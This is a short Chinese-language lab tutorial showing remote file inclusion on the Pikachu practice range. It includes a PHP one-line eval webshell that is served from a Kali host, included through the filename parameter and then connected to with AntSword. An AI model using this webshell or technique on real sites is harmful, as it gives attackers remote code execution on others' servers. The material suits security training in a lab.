演示远程文件包含漏洞
文章目录
前言
通过pikachu
靶场演示远程文件包含漏洞
首先php.ini
文件下的allow_url_include
要等于 On
, 这样就代表PHP 允许通过 URL 的形式,从远程服务器 包含和执行 PHP 文件。
演示
这里选择了科比以后就会出现
filename=include%2Ffile1.php
,这里是访问了一个文件,可能存在着文件包含漏洞,我们可以在kali
上面写一个php脚本,代码如下
<?php
@eval($_REQUEST[maple]);
phpinfo();
?>
kali 开启 http 服务
windows访问kali
这里就会出现php信息,刚刚还同时添加了一句话木马,通过蚁剑连接一下